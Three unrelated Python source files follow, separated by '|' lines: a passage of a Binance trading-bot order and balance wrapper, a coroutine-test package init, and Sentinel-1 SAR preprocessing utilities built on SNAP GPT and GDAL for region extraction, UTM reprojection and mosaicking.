log.info("SELL {} {} at {} on {} FAILED - would make a market order.".format(amount,self.ticker, ask, "binance"))
return MARKET # Maybe needs failed or something
try:
success = self._sell(amount, ask)
if success:
log.info("SELL {} {} at {} on {}".format(amount, self.ticker, ask, "binance"))
return success
else:
log.info("SELL {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, ask, "binance", attempt, self.retries))
attempt += 1
time.sleep(1)
except Exception as e: # TODO - too broad exception handling
raise ValueError(e)
def _buy(self, amount, bid):
''' Places a buy for a number of an asset at the indicated price (0.00000503 for example)
:param amount: string
:param bid: float
:param ticker: string
'''
amt_str = "{:0.0{}f}".format(amount, XMR_AMOUNT_PRECISION)
bid_str = "{:0.0{}f}".format(bid, XMR_PRICE_PRECISION)
info = self.client.get_symbol_info(symbol=self.ticker)
log.info("Bina placing buy bid: {} amount: {}".format(bid_str, amt_str))
order = self.client.create_order(
symbol=self.ticker,
side=SIDE_BUY,
type=ORDER_TYPE_LIMIT,
timeInForce=TIME_IN_FORCE_GTC,
quantity=amt_str,
price=bid_str,
recvWindow=10000000)
return order
def buy(self, amount, bid):
attempt = 0
bid_amount = amount
while attempt < self.retries:
if self.limit_only:
# Get current lowest ask on the orderbook
# If bid price is higher than the lowest ask, return.
if Decimal(float(self.get_lowest_ask())) < bid:
log.info("BUY {} {} at {} on {} FAILED - would make a market order.".format(amount, self.ticker, bid, "binance"))
return MARKET # Maybe needs failed or something
try:
success = self._buy(bid_amount, bid)
if success:
log.info("BUY {} {} at {} on {}".format(bid_amount, self.ticker, bid, "binance"))
return success
else:
log.info("BUY {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, bid, "binance", attempt, self.retries))
attempt += 1
time.sleep(1)
except Exception as e: # TODO - too broad exception handling
raise ValueError(e)
def market_buy(self, amount, bid):
attempt = 0
bid_amount = amount
while attempt < self.retries:
try:
success = self._buy(bid_amount, bid)
if success:
log.info("BUY {} {} at {} on {}".format(bid_amount, self.ticker, bid, "binance"))
return success
else:
log.info("BUY {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, bid, "binance", attempt, self.retries))
attempt += 1
time.sleep(1)
except Exception as e: # TODO - too broad exception handling
raise ValueError(e)
def market_sell(self, amount, ask):
attempt = 0
try:
success = self._sell(amount, ask)
if success:
log.info("SELL {} {} at {} on {}".format(amount, self.ticker, ask, "binance"))
return success
else:
log.info("SELL {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, ask, "binance", attempt, self.retries))
attempt += 1
time.sleep(1)
except Exception as e: # TODO - too broad exception handling
raise ValueError(e)
def get_all_orders(self):
''' Returns all open orders for the ticker XYZ (not BTC_XYZ)
:param coin: string
'''
# TODO: Accept BTC_XYZ by stripping BTC_ if it exists
attempt = 0
while attempt < self.retries:
try:
orders = self.client.get_order_book(symbol=self.ticker)
log.info("get_all_orders", orders)
return orders
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_all_orders on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
def get_my_open_orders(self, context_formatted=False):
''' Returns all open orders for the authenticated user '''
attempt = 0
while attempt < self.retries:
try:
orders = self.client.get_open_orders(symbol=self.ticker, recvWindow=10000000)
new_dict = {}
for order in orders:
id = order['orderId']
new_dict[id] = order
new_dict[id]['id'] = id
if order['side'] == 'BUY':
new_dict[id]['type'] = 'buy'
else:
new_dict[id]['type'] = 'sell'
origQty = Decimal(float(order['origQty']))
executedQty = Decimal(float(order['executedQty']))
new_dict[id]['amount'] = origQty - executedQty
return new_dict
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_my_open_orders on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
# orders is an array of dicts we need to transform it to an dict of dicts to conform to binance
def cancel_order(self, order_id):
''' Cancels the order with the specified order ID
:param order_id: string
'''
log.info("Cancelling order.")
if order_id == 0:
log.warning("Cancel order id 0. Bailing")
return False
attempt = 0
while attempt < self.retries:
try:
canceled_order = self.client.cancel_order(symbol=self.ticker, orderId=order_id)
return canceled_order
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_ticker on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
def get_ticker(self, coin=None):
''' Returns the current ticker data for the given coin. If no coin is given,
it will return the ticker data for all coins.
:param coin: string (of the format BTC_XYZ)
'''
attempt = 0
while attempt < self.retries:
try:
ticker = self.client.get_ticker(symbol=coin)
log.info(ticker)
return ticker
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_ticker on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
def get_24h_volume(self, coin=None):
''' Returns the 24 hour volume for the given coin.
If no coin is given, returns for all coins.
:param coin string (of the form BTC_XYZ where XYZ is the alt ticker)
'''
params = { "method": "get24hvolume" }
response = requests.get(self.url, params=params)
if not coin:
return json.loads(response.text)
response_json = json.loads(response.text)
log.info(response_json[coin])
return response_json[coin]
def get_balance(self, asset):
attempt = 0
while attempt < self.retries:
try:
balance = self.client.get_asset_balance(asset=asset, recvWindow=10000000)
return balance
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_balance on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
def get_balances(self):
''' TODO Function Definition
'''
# also keys go unused, also coin...
base_balance = self.get_balance(asset=self.base)
coin_balance = self.get_balance(asset=self.coin)
base = Decimal(base_balance['free']) + Decimal(base_balance['locked'])
coin = Decimal(coin_balance['free']) + Decimal(coin_balance['locked'])
log.info("Base balance: {}".format(base_balance))
log.info("Coin balance: {}".format(coin_balance))
pair_balances = {"base" : {"amount": {'balance': base},
"name" : self.base},
"coin": {"amount": {'balance': coin},
"name": self.coin},
}
return pair_balances
def process_new_transactions(self, new_txs, context_only=False):
for trade in new_txs:
if trade['isBuyer'] == True:
trade['type'] = 'buy'
else:
trade['type'] = 'sell'
if 'time' in trade:
date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(floor(trade['time']/1000))))
trade['date'] = date
trade['total'] = Decimal(trade['price']) * Decimal(trade['qty'])
trade['amount'] = Decimal(trade['qty'])
if not context_only:
order_info = self.get_order_info(order_id=trade['orderId'])
trade['initamount'] = order_info['origQty']
def get_order_info(self, order_id):
attempt = 0
while attempt < self.retries:
try:
order_info = self.client.get_order(symbol=self.ticker, orderId=order_id, recvWindow=10000000)
return order_info
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_order_info on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
def get_my_trade_history(self, start=0, end=0):
''' TODO Function Definition
'''
log.info("Getting trade history...")
attempt = 0
while attempt < self.retries:
try:
trades = self.client.get_my_trades(symbol=self.ticker, recvWindow=10000000)
trades.reverse()
return trades
except Exception as e: # TODO - too broad exception handling
if attempt == self.retries - 1:
raise ValueError(e)
else:
log.info("get_ticker on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
attempt += 1
def get_last_trade_price(self):
''' TODO Function Definition
'''
return self.get_ticker(self.ticker)["lastPrice"]
def get_lowest_ask(self):
''' TODO Function Definition
'''
return self.get_ticker(self.ticker)["askPrice"]
def get_highest_bid(self):
''' TODO Function Definition
'''
return self.get_ticker(self.ticker)["bidPrice"]
def is_partial_fill(self, order_id):
order_info = self.get_order_info(order_id)
amount_placed = Decimal(order_info['origQty'])
amount_executed = Decimal(order_info['executedQty'])
log.info('Binance checking_is_partial_fill order_id: {} amount_placed: {} amount_executed: {}'.format(order_id, amount_placed, amount_executed))
return amount_placed > amount_executed
def get_total_amount(self, order_id):
order_info = self.get_order_info(order_id)
return Decimal(order_info['origQty'])
|
"""
Tests for coroutines, for Python versions that support them.
"""
import sys
if sys.version_info[:2] >= (3, 5):
from .corotests import CoroutineTests, ContextTests
__all__ = ["CoroutineTests", "ContextTests"]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 15 15:02:49 2018
@author: jingliang, hu
"""
# Last modified: 03.07.2018 00:08:28 Yuanyuan Wang
# Improved logging and exit code
# Last modified: 09.07.2018 12:01:00 Jingliang Hu
# update function 'getTiffExtent' to get EPSG code from tiff ROI
# Last modified: 10.07.2018 14:09:35 Yuanyuan Wang
# added multi thread in gdalwarp
import os
import glob
import subprocess
import numpy as np
import xml.etree.ElementTree as et
from osgeo import ogr,osr,gdal
unfiltStringList = ['geocoded_subset_unfilt_dat','_Orb_Cal_Deb_TC_SUB.tif','mosaic_unfilt_dat']
leefilStringList = ['geocoded_subset_dat','_Orb_Cal_Deb_Spk_TC_SUB.tif','mosaic_dat']
def createGPTTemplate(inputZip, template, geoRegion, region, procFlag, projFlag, projection=0):
# This function updates the gpt preprocessing xml template for each downloaded data and starts the preprocessing
# Input:
# -- inputZip - downloaded sentinel-1 data in zip
# -- template - path to gpt xml template
# -- geoRegion - the coordinate of ROI
# -- region - pixel-wise extent of ROI
# -- procFlag - processing flag: 1: no filtering, 2: lee filtering, 3: water mask, 4: range azimuth complex form, 5: range azimuth covariance matrix (boxcar filtered)
# -- projFlag - projection flag: 1: WGS longitude, latitude, 2: UTM
#
# Output:
# -- template - write the updated template
# -- data - save processed data
#
# Example input:
# inputZip = '/media/sf_So2Sat/data/massive_downloading/0378_index_0033_Adelaide/original_dat/201706/S1A_IW_SLC__1SDV_20170607T200453_20170607T200519_016932_01C2E2_7E63.zip'
# template = '/media/sf_So2Sat/sentinel1_data_processing/ma_data_proc_leeflt_2.0/gpt_template_preprocessing_lee.xml'
# geoRegion = 'POLYGON ((138.47500610351562 -35.087501525878906, 138.75 -35.087501525878906, 138.75 -34.775001525878906, 138.47500610351562 -34.775001525878906, 138.47500610351562 -35.087501525878906, 138.47500610351562 -35.087501525878906))'
# region = '0,0,25234,17679'
try:
gptdir = os.environ['gpt']
except:
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("ERROR: Directory to ESA SNAP TOOLBOX GPT not found in environment variables")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
return 0
city = inputZip.split('/')[-4]
time = inputZip.split('/')[-2]
if procFlag == 1:
outputData = inputZip.replace('original_dat',unfiltStringList[0])
outputData = outputData.replace('.zip',unfiltStringList[1])
elif procFlag == 2:
outputData = inputZip.replace('original_dat',leefilStringList[0])
outputData = outputData.replace('.zip',leefilStringList[1])
elif procFlag == 3:
outputData = inputZip.replace('original_dat','water_mask')
outputData = outputData.replace('.zip','_water_mask.tif')
elif procFlag == 4:
outputData = inputZip.replace('original_dat','rangeAzimuth_dat')
outputData = outputData.replace('.zip','_Orb_Cal_Deb_Sub.dim')
elif procFlag == 5:
outputData = inputZip.replace('original_dat','rangeAzimuth_nlm_dat')
outputData = outputData.replace('.zip','_Orb_Cal_Deb_Spk_Sub.dim')
else:
print("ERROR: INDICATED PROCESSING (procFlag) IS NOT YET SUPPORTED")
exit(1)
outputPath = '/'.join(outputData.split('/')[:-1])
tree = et.parse(template)
root = tree.getroot()
for node in root.findall('node'):
if node[0].text == 'Read':
node[2][0].text = inputZip
elif node[0].text == 'Write':
node[2][0].text = outputData
elif node[0].text == 'Subset':
node[2][1].text = region
node[2][2].text = geoRegion
elif node[0].text == 'Terrain-Correction' and projection != 0:
node[2][9].text = projection
# XML File configure
if not os.path.exists(outputPath):
os.makedirs(outputPath)
if procFlag == 1:
xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_TC_SUB.xml"
print(" ")
print("#############################################################")
print("INFO: Data of the city "+city+" at the time of "+time)
print("INFO: Apply orbit file, calibration, deburst, terrain correction, subset: ")
elif procFlag == 2:
xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_Spk_TC_SUB.xml"
print(" ")
print("#############################################################")
print("INFO: Data of the city "+city+" at the time of "+time)
print("INFO: Apply orbit file, calibration, deburst, Lee filtering, terrain correction, subset: ")
elif procFlag == 3:
xmldir = outputPath + "/_water_mask.xml"
print(" ")
print("#############################################################")
print("INFO: Water mask for data of the city "+city+" at the time of "+time)
print("INFO: Apply orbit file, calibration, deburst, filtering, terrain correction, subset: ")
elif procFlag == 4:
xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_Sub.xml"
print(" ")
print("#############################################################")
print("INFO: range azimuth data in complex form of the city "+city+" at the time of "+time)
print("INFO: Apply orbit file, calibration, deburst, subset: ")
elif procFlag == 5:
xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_Spk_Sub.xml"
print(" ")
print("#############################################################")
print("INFO: range azimuth data in covariance matrix form of the city "+city+" at the time of "+time)
print("INFO: Apply orbit file, calibration, deburst, filtering, subset: ")
# write the graph xml
tree.write(xmldir)
if os.path.exists(outputData):
print('INFO: Output file exist')
print("#############################################################")
print(" ")
subprocess.call([gptdir,xmldir])
return 2, outputData
else:
subprocess.call([gptdir,xmldir])
print('INFO: process done')
print("#############################################################")
print(" ")
return 1, outputData
def getGeoRegion(cpath,kmlCityList):
# This function read the unique index of city for data indicated by cpath, and then find the coordinates of the corresponding ROI
# Input
# -- cpath - path to the file of city, where data saved
# -- kmlCityList - path to the ROI kml file
#
# Output
# -- geoRegion - WKT format coordinate of ROI in longitude and latitude
# -- centerPoint - longitude and latitude of the center point to the ROI
# read the unique index of city
temp = cpath.split('/')[-1].split('_')
# print cpath
# print temp
idx = int(temp[1])
# find the ROI coordinate of the city
tree = et.parse(kmlCityList)
for item in tree.findall('.//{http://www.opengis.net/kml/2.2}Placemark'):
if item[1][0][3].text == str(idx):
found = item
break
# convert the text coordinate into WKT coordinate
coordText = found[2][0][0][0].text
temp = coordText.split(' ')
x = np.zeros([5,1])
y = np.zeros([5,1])
for i in range(0,len(temp)):
a,b = temp[i].split(',')
x[i] = np.double(a)
y[i] = np.double(b)
xmin = np.min(x)
xmax = np.max(x)
ymin = np.min(y)
ymax = np.max(y)
centerPoint = np.array([np.float32(xmin+xmax)/2,np.float32(ymin+ymax)/2])
# create a polygon
ring = ogr.Geometry(ogr.wkbLinearRing)
ring.AddPoint(xmin,ymin)
ring.AddPoint(xmax,ymin)
ring.AddPoint(xmax,ymax)
ring.AddPoint(xmin,ymax)
ring.AddPoint(xmin,ymin)
poly = ogr.Geometry(ogr.wkbPolygon)
poly.AddGeometry(ring)
geoRegion = poly.ExportToWkt()
return geoRegion, centerPoint
def getROIPoints(cpath,kmlCityList):
# This function finds the WGS coordinates of ROI for one city
# Input
# -- cpath - path to the file of city, where data saved
# -- kmlCityList - path to the ROI kml file
#
# Output
# -- points - a 3 by 2 array,
# - 1st column is longitude, 2nd column is latitude
# - 1st row: center point, 2nd row: upper-left cornor, 3rd row: bottom-right cornor
# read the unique index of city
temp = cpath.split('/')[-1].split('_')
# print cpath
# print temp
idx = int(temp[1])
# find the ROI coordinate of the city
tree = et.parse(kmlCityList)
for item in tree.findall('.//{http://www.opengis.net/kml/2.2}Placemark'):
if item[1][0][3].text == str(idx):
found = item
break
coordText = found[2][0][0][0].text
temp = coordText.split(' ')
x = np.zeros([5,1])
y = np.zeros([5,1])
for i in range(0,len(temp)):
a,b = temp[i].split(',')
x[i] = np.double(a)
y[i] = np.double(b)
xmin = np.min(x)
xmax = np.max(x)
ymin = np.min(y)
ymax = np.max(y)
points = np.array([[np.float32(xmin+xmax)/2,np.float32(ymin+ymax)/2],[xmin,ymax],[xmax,ymin]])
return points
def roiLatlon2UTM(WGSPoint,outputEPSG=0):
# This function transfers geographical coordinate (lon-lat) into WGS 84 / UTM zone coordinate using GDAL
# Input:
# -- WGSPoint - A N by M array of lon-lat coordinate; N is number of points, 1st col is longitude, 2nd col is latitude
# -- outputEPSG - targeting UTM zone code
#
# Output:
# -- UTMPoints - A N by M array of WGS 84 /UTM zone coordinate; N is number of points, 1st col is X, 2nd col is Y
# -- outputEPSG - A UTM EPSG code calculated from the center of ROI
# -- utmProjInfo - A string contains comprehensive utm projection information
#
WGSPoint = np.array(WGSPoint).astype(np.float64)
if len(WGSPoint.shape)==1:
WGSPoint = np.stack((WGSPoint,WGSPoint),axis=0)
nb,dim = np.shape(WGSPoint)
elif len(WGSPoint.shape)==2:
# number of WGSPoint
nb,dim = np.shape(WGSPoint)
elif len(WGSPoint.shape)==3:
print('ERROR: DIMENSION OF POINTS SHOULD NO MORE THAN TWO')
# geographic coordinate (lat-lon) WGS84
inputEPSG = 4326
# WGS 84 / UTM zone
if outputEPSG==0:
if WGSPoint[0][1]<0:
outputEPSG = 32700
else:
outputEPSG = 32600
outputEPSG = int(outputEPSG + np.floor((WGSPoint[0][0]+180)/6) + 1)
# create coordinate transformation
inSpatialRef = osr.SpatialReference()
inSpatialRef.ImportFromEPSG(inputEPSG)
outSpatialRef = osr.SpatialReference()
outSpatialRef.ImportFromEPSG(outputEPSG)
utmProjInfo = outSpatialRef.ExportToWkt()
coordTransform = osr.CoordinateTransformation(inSpatialRef, outSpatialRef)
# transform point
UTMPoints = np.zeros(WGSPoint.shape)
for i in range(0,np.size(WGSPoint,axis=0)):
p = ogr.Geometry(ogr.wkbPoint)
p.AddPoint(WGSPoint[i][1], WGSPoint[i][0])
p.Transform(coordTransform)
UTMPoints[i][0] = p.GetX()
UTMPoints[i][1] = p.GetY()
return UTMPoints, outputEPSG, utmProjInfo
def latlon2utm(points):
# This function transfers geographical coordinate (lon-lat) into WGS 84 / UTM zone coordinate using GDAL
# Input:
# -- points - A N by M array of lon-lat coordinate; N is number of points, 1st col is longitude, 2nd col is latitude
#
# Output:
# -- points - A N by M array of WGS 84 /UTM zone coordinate; N is number of points, 1st col is X, 2nd col is Y
#
points = np.array(points)
if len(points.shape)==1:
points = np.stack((points,points),axis=0)
nb,dim = np.shape(points)
elif len(points.shape)==2:
# number of points
nb,dim = np.shape(points)
elif len(points.shape)==3:
print('ERROR: DIMENSION OF POINTS SHOULD NO MORE THAN TWO')
# geographic coordinate (lat-lon) WGS84
inputEPSG = 4326
# WGS 84 / UTM zone
if points[0][1]<0:
outputEPSG = 32700
else:
outputEPSG = 32600
outputEPSG = int(outputEPSG + np.floor((points[0][0]+180)/6) + 1)
# # WGS 84 / Pseudo-Mercator
# outputEPSG = 3857
# create coordinate transformation
inSpatialRef = osr.SpatialReference()
inSpatialRef.ImportFromEPSG(inputEPSG)
outSpatialRef = osr.SpatialReference()
outSpatialRef.ImportFromEPSG(outputEPSG)
utmProjInfo = outSpatialRef.ExportToWkt()
coordTransform = osr.CoordinateTransformation(inSpatialRef, outSpatialRef)
# transform point
for i in range(0,np.size(points,axis=0)):
p = ogr.Geometry(ogr.wkbPoint)
p.AddPoint(points[i][0], points[i][1])
p.Transform(coordTransform)
points[i][0] = p.GetX()
points[i][1] = p.GetY()
return points,utmProjInfo
def getRegion(cpath,kmlCityList):
# setting the resolution of raster image
res = 10
# read the unique index of city
temp = cpath.split('/')[-1].split('_')
idx = int(temp[1])
# find the ROI coordinate of the city
tree = et.parse(kmlCityList)
for item in tree.findall('.//{http://www.opengis.net/kml/2.2}Placemark'):
if item[1][0][3].text == str(idx):
found = item
break
# convert the text coordinate into WKT coordinate
coordText = found[2][0][0][0].text
temp = coordText.split(' ')
x = np.zeros([5,1])
y = np.zeros([5,1])
for i in range(0,len(temp)):
a,b = temp[i].split(',')
x[i] = np.double(a)
y[i] = np.double(b)
xmin = np.min(x)
xmax = np.max(x)
ymin = np.min(y)
ymax = np.max(y)
points = np.array([[xmin,ymin],[xmax,ymax]])
# convert geographic coordinate into WGS 84 / UTM zone coordinate
points,_ = latlon2utm(points)
widHei = np.round((points[1]-points[0])/res)
widHei = widHei.astype(int)
region = '0,0,'+str(widHei[0])+','+str(widHei[1])
return region
def getPathOfCity(dpath):
# dpath = '/media/sf_So2Sat/data/massive_downloading'
cityPath = glob.glob(dpath+'/*')
i = 0
while i < len(cityPath):
cpath = cityPath[i]
temp = cityPath[i].split('/')[-1].split('_')
i = i + 1
if not os.path.isdir(cpath) or len(temp)!=3:
print(cpath)
print('The directory is either not a directory, or is not named in standard. And it has been removed')
cityPath.remove(cpath)
i = i - 1
return cityPath
def getPathOfTime(cpath):
timePath = glob.glob(cpath+'/original_dat/*')
return timePath
def getPath2Data(tpath):
zipPath = glob.glob(tpath+'/*.zip')
return zipPath
def gdalMosaic(zipPath, procFlag, utmEPSG, extent=0, resolution = 10):
extent = np.array(extent)
# mosaic data of unfiltered, lee filtered, and water mask
if procFlag == 1:
inputPath = zipPath[0].replace('original_dat','geocoded_subset_unfilt_dat')
outputPath = zipPath[0].replace('original_dat','mosaic_unfilt_dat')
elif procFlag == 2:
inputPath = zipPath[0].replace('original_dat','geocoded_subset_dat')
outputPath = zipPath[0].replace('original_dat','mosaic_dat')
elif procFlag == 3:
inputPath = zipPath[0].replace('original_dat','water_mask')
outputPath = zipPath[0].replace('original_dat','mosaic_water_mask')
elif procFlag == 4:
inputPath = zipPath[0].replace('original_dat','geocoded_unfilt_Hres_dat')
outputPath = zipPath[0].replace('original_dat','mosaic_unfilt_Hres_dat')
elif procFlag == 5:
inputPath = zipPath[0].replace('original_dat','geocoded_Hres_dat')
outputPath = zipPath[0].replace('original_dat','mosaic_nlm_Hres_dat')
inputPath = '/'.join(inputPath.split('/')[:-1])+'/*.tif'
files = glob.glob(inputPath)
image_name = '/'.join(files[0].split('/')[-3:])
outputPath = '/'.join(outputPath.split('/')[:-1])
mosaicpath = outputPath +'/mosaic.tif'
if os.path.exists(mosaicpath):
subprocess.call(['rm',mosaicpath])
if len(zipPath)==1:
# only one data covers ROI, no mosaic needed
# but make symbolic link
# make directory if not exist
if not os.path.exists(outputPath):
os.makedirs(outputPath)
# >>Jingliang, please comment
if extent.shape[0] == 1:
subprocess.call(['ln', '-s', '../../'+image_name, mosaicpath])
return 3
elif extent.shape[0] == 4:
comm = ['gdalwarp','-multi','-wo','NUM_THREADS=4','-t_srs','EPSG:'+str(utmEPSG),'-srcnodata', '0', '-dstnodata', '0', '-tr', str(resolution), str(resolution), '-te', str(extent[0]), str(extent[2]), str(extent[1]), str(extent[3]) ]
for idxfile in range(0,len(files)):
comm.append(files[idxfile])
comm.append(mosaicpath)
subprocess.call(comm)
return comm
elif len(zipPath)>1:
# more than one data cover ROI, mosaicing needed
# forming the gdalwarp command
# >>Jingliang, pleaser comment
if extent.shape[0] == 1:
comm = ['gdalwarp','-multi','-wo','NUM_THREADS=4','-srcnodata', '0', '-dstnodata', '0']
for idxfile in range(0,len(files)):
comm.append(files[idxfile])
comm.append(mosaicpath)
elif extent.shape[0] == 4:
comm = ['gdalwarp','-multi','-wo','NUM_THREADS=4','-t_srs','EPSG:'+str(utmEPSG), '-srcnodata', '0', '-dstnodata', '0', '-tr', str(resolution), str(resolution), '-te', str(extent[0]), str(extent[2]), str(extent[1]), str(extent[3]) ]
for idxfile in range(0,len(files)):
comm.append(files[idxfile])
comm.append(mosaicpath)
else:
print('ERROR: THE GIVEN EXTENT IN MOSAICING IS WRONG ')
print(" ")
# overwrite existed mosaiced file
if os.path.exists(mosaicpath):
# mosaiced data already exists
print('INFO: Output file exist, now overwriting ')
print(" ")
subprocess.call(comm)
return 2
elif not os.path.exists(outputPath):
os.makedirs(outputPath)
subprocess.call(comm)
return comm
else :
# the directory exists, but mosaic file does not exist
subprocess.call(comm)
return comm
def getProjTiff(cpath,tiffFolder):
# get WGS84/UTM projection from geotiff
dataCityName = cpath.split('/')[-1].split('_')
dataCityName = dataCityName[-1].lower()
tiffCities = glob.glob(tiffFolder+'/*')
for i in range(0,len(tiffCities)):
tiffcity = tiffCities[i].split('/')[-1]
cityName = tiffcity.replace('_','')
# print cityName,tiffcity
if cityName in dataCityName:
tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
try:
tifdat = gdal.Open(tiffPath)
except Exception:
tiffPath.replace('.tif','.TIF')
tifdat = gdal.Open(tiffPath)
break
# map projection
proj = tifdat.GetProjectionRef()
return proj
def getTiffExtent(cpath,tiffFolder):
# get the geographic extent of tiff file
dataCityName = cpath.split('/')[-1].split('_')
dataCityName = dataCityName[-1].lower()
tiffCities = glob.glob(tiffFolder+'/*')
for i in range(0,len(tiffCities)):
tiffcity = tiffCities[i].split('/')[-1]
cityName = tiffcity.replace('_','')
if cityName in dataCityName:
tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
try:
tifdat = gdal.Open(tiffPath)
# xmin, xres, xskew, ymax, yskew, yres = tifdat.GetGeoTransform()
except Exception:
tiffPath.replace('.tif','.TIF')
tifdat = gdal.Open(tiffPath)
# xmin, xres, xskew, ymax, yskew, yres = tifdat.GetGeoTransform()
xmin, xres, xskew, ymax, yskew, yres = tifdat.GetGeoTransform()
proj = osr.SpatialReference(wkt=tifdat.GetProjection())
utmEPSG = np.int(proj.GetAttrValue('AUTHORITY',1))
break
xmax = xmin + (tifdat.RasterXSize * xres)
ymin = ymax + (tifdat.RasterYSize * yres)
return xmin,xmax,ymin,ymax,utmEPSG
def getGeoRegionTiff(cpath,tiffFolder):
dataCityName = cpath.split('/')[-1].split('_')
dataCityName = dataCityName[-1].lower()
tiffCities = glob.glob(tiffFolder+'/*')
for i in range(0,len(tiffCities)):
tiffcity = tiffCities[i].split('/')[-1]
cityName = tiffcity.replace('_','')
if cityName in dataCityName:
tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
try:
tifdat = gdal.Open(tiffPath)
ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
except Exception:
tiffPath.replace('.tif','.TIF')
tifdat = gdal.Open(tiffPath)
ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
break
lrx = ulx + (tifdat.RasterXSize * xres)
lry = uly + (tifdat.RasterYSize * yres)
# buffering
x_buffer = 1000
y_buffer = 1000
ulx = ulx - x_buffer
lrx = lrx + x_buffer
lry = lry - y_buffer
uly = uly + y_buffer
# Setup the source projection - you can also import from epsg, proj4...
source = osr.SpatialReference()
source.ImportFromWkt(tifdat.GetProjection())
# The target wgs84/lonlat projection
target = osr.SpatialReference()
target.ImportFromEPSG(4326)
# Create the transform - this can be used repeatedly
transform = osr.CoordinateTransformation(source, target)
# Transform the point. You can also create an ogr geometry and use the more generic `point.Transform()`
ul = transform.TransformPoint(ulx, uly)
lr = transform.TransformPoint(lrx, lry)
# ROI coordinates in WGS84/lonlat
coordinate = [ul[0],lr[0],lr[1],ul[1]]
# map projection
xmin = coordinate[0]
xmax = coordinate[1]
ymin = coordinate[2]
ymax = coordinate[3]
ring = ogr.Geometry(ogr.wkbLinearRing)
ring.AddPoint(xmin,ymin)
ring.AddPoint(xmax,ymin)
ring.AddPoint(xmax,ymax)
ring.AddPoint(xmin,ymax)
ring.AddPoint(xmin,ymin)
poly = ogr.Geometry(ogr.wkbPolygon)
poly.AddGeometry(ring)
georegion = poly.ExportToWkt()
return georegion
def getRegionTiff(cpath,tiffFolder):
dataCityName = cpath.split('/')[-1].split('_')
dataCityName = dataCityName[-1].lower()
tiffCities = glob.glob(tiffFolder+'/*')
for i in range(0,len(tiffCities)):
tiffcity = tiffCities[i].split('/')[-1]
cityName = tiffcity.replace('_','')
# print cityName,tiffcity
if cityName in dataCityName:
tiffPath = tiffCities[i]+'/'+tiffcity+'_lcz_GT.tif'
try:
tifdat = gdal.Open(tiffPath)
ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
except Exception:
tiffPath.replace('.tif','.TIF')
tifdat = gdal.Open(tiffPath)
ulx, xres, xskew, uly, yskew, yres = tifdat.GetGeoTransform()
break
lrx = ulx + (tifdat.RasterXSize * xres)
lry = uly + (tifdat.RasterYSize * yres)
width = int((lrx-ulx)/10+100)
height = int((uly-lry)/10+100)
region = '0,0,'+str(width)+','+str(height)
return region
def readSEN1TIFF2NLSAR(path):
# this function read Sentinel-1 geotiff data, and organizes it into the format of NLSAR software
# path = '/datastore/DATA/classification/SEN1/LCZ42_SEN1/LCZ42_22606_Zurich/rangeAzimuth_dat/201706/S1B_IW_SLC__1SDV_20170602T053407_20170602T053434_005867_00A499_A351_rangeAzimuth.tif'
try:
tifID = gdal.Open(path)
except RuntimeError:
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("ERROR: the given SENTINEL-1 geotiff can not be open by GDAL")
print("DIRECTORY: "+path)
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
sys.exit(1)
data = tifID.ReadAsArray()
dn,rw,cl = data.shape
nlsardata = np.zeros((rw,cl,2,2),dtype=np.complex64)
nlsardata[:,:,0,0] = np.square(data[0,:,:])+np.square(data[1,:,:])
nlsardata[:,:,0,1] = (data[0,:,:]*data[2,:,:]+data[1,:,:]*data[3,:,:])+(data[1,:,:]*data[2,:,:]-data[0,:,:]*data[3,:,:])*1j
nlsardata[:,:,1,0] = np.conjugate(nlsardata[:,:,0,1])
nlsardata[:,:,1,1] = np.square(data[2,:,:])+np.square(data[3,:,:])
return nlsardata
def readSEN1DimComplex2NLSAR(path):
# this function read Sentinel-1 data in its DIM form, and organizes it into the format of NLSAR software
# path = '/datastore/DATA/classification/SEN1/LCZ42_SEN1/LCZ42_22606_Zurich/rangeAzimuth_dat/201706/S1B_IW_SLC__1SDV_20170602T053407_20170602T053434_005867_00A499_A351_Orb_Cal_Deb_Sub.data'
